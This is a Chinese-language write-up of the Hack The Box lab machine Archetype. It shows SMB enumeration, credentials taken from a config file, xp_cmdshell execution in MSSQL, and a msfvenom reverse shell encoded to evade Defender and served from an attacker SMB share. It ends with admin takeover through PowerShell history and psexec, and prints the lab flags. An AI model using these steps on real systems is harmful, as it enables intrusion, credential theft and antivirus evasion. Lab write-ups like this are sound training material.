是的！我買ㄌ Hack The Box 的 VIP+，因為我覺得 Try Hack Me 上面的 Windows 題目都太新手不友善了，相較之下， Hack The Box 的 Windows 題目比較多元，所以今天開始我應該都會來玩 Hack The Box 的題目！ 官方說這題是 Very Easy，但我個人卻覺得有一點小難QQ。

• URL : https://app.hackthebox.eu/machines/287
• IP : 10.10.10.27

掃 Port

• rustscan -a 10.10.10.27 -r 1-65535
  • 
• nmap 繼續掃
  • nmap -A -p135,139,445,5985,47001,49664,49665,49666,49667,49669,49668 10.10.10.27
    • 
    • 一堆的 RPC
    • SMB
    • 1433 是 MSSQL

SMB

• SMB 匿名登入

  • 
  • 發現 backups

• backups 資料夾

  • 
    • 一個 Config 載下來
  • 

• 取得密碼資訊

  • 
  • Host Name : ARCHETYPE
  • User ID : sql_svc
  • Password : M3g4c0rp123

MSSQL

• 安裝 impacket
  • sudo apt install python3-impacket
• impacket-mssqlclient -p 1433 sql_svc@10.10.10.27 -windows-auth
  • 
• MSSQL 取得 Shell 就有機會可以 RCE
  • exec xp_cmdshell '{指令}'
• systeminfo
  • 
• dir
  • exec xp_cmdshell 'dir'
• 透過開啟本地 smb
  • impacket-smbserver meow .
• 準備 Reverse shell
  • msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.16 LPORT=7877 -e x86/shikata_ga_nai -f exe > shell.exe
    • 經測試，不掛 x86/shikata_ga_nai 就會被 Defender 吃掉
    • Windows 的 Reverse Shell 通常都會使用 msfvenom 來產

Shell

• 執行 Shell
  • exec xp_cmdshell '\\10.10.16.16\meow\shell.exe'
  • 
• 收回 Reverse shell
  • 
• 取得 User Flag
  • 
  • 3e7b102e78218e935bf3f4951fec21a3

嘗試提權

• 試著使用 Windows exploit suggester
  • windows-exploit-suggester.py
    • 壞ㄌ QQ 不支援 2019
• WESNG
  • https://github.com/bitsadmin/wesng
  • 找不到洞 QQ
• whoami /priv
  • 
  • 發現有 SeImpersonatePrivilege
• SeImpersonatePrivilege 提權嘗試
  • https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens
  • https://github.com/itm4n/PrintSpoofer
  • 失敗 QQ

正式提權

• Powershell history
  • %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
• Get Username and password
  • 
  • Username : administrator
  • Password : MEGACORP_4dm1n!!
• Use psexec to get shell
  impacket-psexec administrator:'MEGACORP_4dm1n!!'@10.10.10.27
  • 
• Get root flag
  • 
  • b91ccec3305e98240082d4474b848528